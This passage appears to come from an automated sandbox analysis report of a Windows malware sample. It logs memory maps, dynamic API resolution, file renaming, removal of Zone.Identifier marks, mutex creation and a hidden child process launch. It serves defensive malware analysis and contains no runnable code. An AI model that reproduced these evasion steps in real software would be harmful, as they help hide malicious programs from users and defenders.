| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7559ae5f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x74d43f49 |
|
1 |
Process #12: 5kyzze.exe
50
0
| Information | Value |
|---|---|
| ID | #12 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\5kyzze.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\5kyzzE.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:27, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8f0 |
| Parent PID | 0x8bc (c:\users\aetadzjz\appdata\local\microsoft\windows\5kyzze.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
8E4
0x
8D0
0x
868
0x
86C
0x
7BC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0028ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00296fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002c2fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x0030ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0031ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0032dfff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0033dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0034ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x00350fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000360000 | 0x00360000 | 0x00361fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x003effff | Private Memory | Readable, Writable |
|
|
|
- |
| windowsshell.manifest | 0x003f0000 | 0x003f0fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003f0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| 5kyzze.exe | 0x00400000 | 0x00420fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x005b7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x006fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x00880fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x01c8ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001c90000 | 0x01c90000 | 0x02082fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x02090000 | 0x0235efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002360000 | 0x02360000 | 0x0245ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002460000 | 0x02460000 | 0x0249ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000024a0000 | 0x024a0000 | 0x0259ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000025a0000 | 0x025a0000 | 0x025dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000025e0000 | 0x025e0000 | 0x026dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000026e0000 | 0x026e0000 | 0x0280ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000026e0000 | 0x026e0000 | 0x027befff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000027c0000 | 0x027c0000 | 0x027c1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000027d0000 | 0x027d0000 | 0x0280ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002810000 | 0x02810000 | 0x02810fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| cversions.1.db | 0x02820000 | 0x02823fff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x02820000 | 0x02823fff | Memory Mapped File | Readable |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x02830000 | 0x0284ffff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000002850000 | 0x02850000 | 0x02850fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x02860000 | 0x0288ffff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x02890000 | 0x02893fff | Memory Mapped File | Readable |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x028a0000 | 0x02905fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000002910000 | 0x02910000 | 0x02910fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002910000 | 0x02910000 | 0x0294ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002950000 | 0x02950000 | 0x02a4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| comctl32.dll | 0x73e60000 | 0x73ffdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| propsys.dll | 0x742a0000 | 0x74394fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasman.dll | 0x743a0000 | 0x743b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x743c0000 | 0x74411fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pdh.dll | 0x74420000 | 0x7445bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x744c0000 | 0x7453ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x74610000 | 0x7461efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x74620000 | 0x74638fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x74640000 | 0x74648fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netapi32.dll | 0x74650000 | 0x74660fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x74760000 | 0x74775fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntmarta.dll | 0x74780000 | 0x747a0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x747b0000 | 0x747c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wtsapi32.dll | 0x747d0000 | 0x747dcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x747e0000 | 0x747eafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| secur32.dll | 0x747f0000 | 0x747f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msi.dll | 0x74800000 | 0x74a3ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x74c90000 | 0x74ca1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74ee0000 | 0x74ffcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x751d0000 | 0x75204fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x75290000 | 0x7542cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x75430000 | 0x75565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wldap32.dll | 0x75700000 | 0x75744fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x757b0000 | 0x757bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x75860000 | 0x75886fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x765a0000 | 0x7679afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x767a0000 | 0x76822fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76890000 | 0x76895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76a20000 | 0x76aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76b40000 | 0x76c34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Threads
Thread 0x8e4
38
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x75570000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\user32.dll, process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\5kyzze.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 264 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18faec |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18fb34 |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x74cc5a4b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x74cdeceb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74cc11c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x74cc14e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x770fe026 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x74cc14c9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x74cc11a9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x74cc1809 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x74cc11f8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeConsole, address_out = 0x74d66aa8 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75570000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7559ae5f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x74d43f49 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\5kyzze.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\5kyzzE.exe, size = 260 |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\OverloadGabriola.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\5kyzzE.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\5kyzze.exe |
|
1 | |
| System | Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Mutex | Create | mutex_name = Global\I705BA84C |
|
1 | |
| Mutex | Create | mutex_name = Global\M705BA84C |
|
1 | |
| Mutex | Release | mutex_name = Global\I705BA84C |
|
1 | |
| System | Get Time | type = Ticks, time = 189759 |
|
1 |
Thread 0x868
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 190773 |
|
1 |
Thread 0x86c
11
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 191772 |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\, type = file_attributes |
|
1 | |
| File | Move | source_filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\5kyzzE.exe, destination_filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe:Zone.Identifier |
|
1 | |
| Process | Create | process_name = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, os_pid = 0xa50, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 |
Process #13: narrowexisting.exe
28
0
| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:30, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa50 |
| Parent PID | 0x8f0 (c:\users\aetadzjz\appdata\local\microsoft\windows\5kyzze.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
7AC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a6fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x0022ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000230000 | 0x00230000 | 0x00231fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0033ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00340000 | 0x003a6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003c2fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003ddfff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003edfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| 5kyzze.exe | 0x00400000 | 0x00420fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x004affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004b0000 | 0x004b0000 | 0x004bffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004c0000 | 0x004c0000 | 0x00647fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000650000 | 0x00650000 | 0x007d0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000007e0000 | 0x007e0000 | 0x01bdffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001c10000 | 0x01c10000 | 0x01c4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001c50000 | 0x01c50000 | 0x02042fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x02050000 | 0x0231efff | Memory Mapped File | Readable |
|
|
|
- |
| rasman.dll | 0x743a0000 | 0x743b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x743c0000 | 0x74411fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pdh.dll | 0x74420000 | 0x7445bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x74610000 | 0x7461efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x74620000 | 0x74638fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x74640000 | 0x74648fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netapi32.dll | 0x74650000 | 0x74660fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| secur32.dll | 0x747f0000 | 0x747f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msi.dll | 0x74800000 | 0x74a3ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x74c90000 | 0x74ca1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74ee0000 | 0x74ffcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x751d0000 | 0x75204fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x75290000 | 0x7542cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x75430000 | 0x75565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x757b0000 | 0x757bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x75860000 | 0x75886fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x765a0000 | 0x7679afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76890000 | 0x76895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76a20000 | 0x76aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76b40000 | 0x76c34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
